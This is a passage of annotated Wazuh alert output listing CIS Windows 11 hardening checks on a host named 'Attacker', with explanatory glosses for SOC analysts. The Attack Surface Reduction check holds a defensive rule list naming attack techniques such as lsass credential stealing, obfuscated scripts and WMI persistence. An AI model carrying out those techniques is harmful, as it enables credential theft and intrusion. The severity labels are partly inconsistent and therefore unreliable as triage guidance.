Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.45.1']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2601768
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26316
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows backup and restore of cellular text messages to Microsoft's cloud services. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  In a high security environment, data should never be sent to any 3rd party since this data could contain sensitive information.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Messaging\Allow Message Service Cloud Sync. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Messaging.admx/adml that is included with the Microsoft Windows 10 Release 1709 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.45.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Messaging']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.069+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.069+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.46.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2604945
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26317
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This setting determines whether applications and services on the device can utilize new consumer Microsoft account authentication via the Windows OnlineID and WebAccountManager APIs. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Organizations that want to effectively implement identity management policies and maintain firm control of what accounts are used on their computers will probably want to block Microsoft accounts. Organizations may also need to block Microsoft accounts in order to meet the requirements of compliance standards that apply to their information systems.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft accounts\Block all consumer Microsoft account user authentication. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template MSAPolicy.admx/adml that is included with the Microsoft Windows 10 Release 1703 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.46.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  8.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\MicrosoftAccount']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.084+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.084+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.4.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2608665
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26318
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting configures a local override for the configuration to join Microsoft Active Protection Service (MAPS), which Microsoft renamed to Windows Defender Antivirus Cloud Protection Service and then Microsoft Defender Antivirus Cloud Protection Service. This setting can only be set by Group Policy. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The decision on whether or not to participate in Microsoft MAPS / Microsoft Defender Antivirus Cloud Protection Service for malicious software reporting should be made centrally in an enterprise managed environment, so that all computers within it behave consistently in that regard. Configuring this setting to Disabled ensures that the decision remains centrally managed.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\MAPS\Configure local setting override for reporting to Microsoft MAPS. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Join Microsoft MAPS' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Join Microsoft MAPS' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.100+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.100+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Join Microsoft MAPS' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.4.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2612831
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26319
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Join Microsoft MAPS' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to join Microsoft Active Protection Service (MAPS), which Microsoft renamed to Windows Defender Antivirus Cloud Protection Service and then Microsoft Defender Antivirus Cloud Protection Service. Microsoft MAPS / Microsoft Defender Antivirus Cloud Protection Service is the online community that helps you choose how to respond to potential threats. The community also helps stop the spread of new malicious software infections. You can choose to send basic or additional information about detected software. Additional information helps Microsoft create new definitions and help it to protect your computer. Possible options are: - (0x0) Disabled (default) - (0x1) Basic membership - (0x2) Advanced membership Basic membership will send basic information to Microsoft about software that has been detected including where the software came from the actions that you apply or that are applied automatically and whether the actions were successful. Advanced membership in addition to basic information will send more information to Microsoft about malicious software spyware and potentially unwanted software including the location of the software file names how the software operates and how it has impacted your computer. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The information that would be sent can include things like location of detected items on your computer if harmful software was removed. The information would be automatically collected and sent. In some instances personal information might unintentionally be sent to Microsoft. However, Microsoft states that it will not use this information to identify you or contact you. For privacy reasons in high security environments, it is best to prevent these data submissions altogether.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\MAPS\Join Microsoft MAPS. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.4.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.131+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.131+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.5.1.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2618728
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26321
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting sets the Attack Surface Reduction rules. The recommended state for this setting is: 26190899-1602-49e8-8b27-eb1d0a1ce869 - 1 (Block Office communication application from creating child processes) 3b576869-a4ec-4529-8536-b80a7769e899 - 1 (Block Office applications from creating executable content) 5beb7efe-fd9a-4556-801d-275e5ffc04cc - 1 (Block execution of potentially obfuscated scripts) 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 - 1 (Block Office applications from injecting code into other processes) 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c - 1 (Block Adobe Reader from creating child processes) 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b - 1 (Block Win32 API calls from Office macro) 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 - 1 (Block credential stealing from the Windows local security authority subsystem (lsass.exe)) b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 - 1 (Block untrusted and unsigned processes that run from USB) be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 - 1 (Block executable content from email client and webmail) d3e037e1-3eb8-44c8-a917-57927947596d - 1 (Block JavaScript or VBScript from launching downloaded executable content) d4f940ab-401b-4efc-aadc-ad5f3c50688a - 1 (Block Office applications from creating child processes) e6db77e5-3df2-4cf1-b95a-636979351e5b - 1 (Block persistence through WMI event subscription) Note: More information on ASR rules can be found at the following link: Use Attack surface reduction rules to prevent malware infection | Microsoft Docs
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Attack surface reduction helps prevent actions and apps that are typically used by exploit-seeking malware to infect machines.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path so that 26190899-1602-49e8-8b27-eb1d0a1ce869, 3b576869-a4ec-4529-8536-b80a7769e899, 5beb7efe-fd9a-4556-801d-275e5ffc04cc, 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84, 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c, 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b, 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2, b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4, be9ba2d9-53ea-4cdc-84e5-9b1eeee46550, d3e037e1-3eb8-44c8-a917-57927947596d, d4f940ab-401b-4efc-aadc-ad5f3c50688a, and e6db77e5-3df2-4cf1-b95a-636979351e5b are each set to a value of 1: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Microsoft Defender Exploit Guard\Attack Surface Reduction\Configure Attack Surface Reduction rules: Set the state for each ASR rule. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 10 Release 1709 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.5.1.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  CM.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\ASR\\Rules']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off real-time protection' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off real-time protection' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.195+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.195+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off real-time protection' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.9.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2629197
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26325
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off real-time protection' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting configures real-time protection prompts for known malware detection. Microsoft Defender Antivirus alerts you when malware or potentially unwanted software attempts to install itself or to run on your computer. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn off real-time protection. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.9.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on behavior monitoring' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on behavior monitoring' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.210+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.210+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

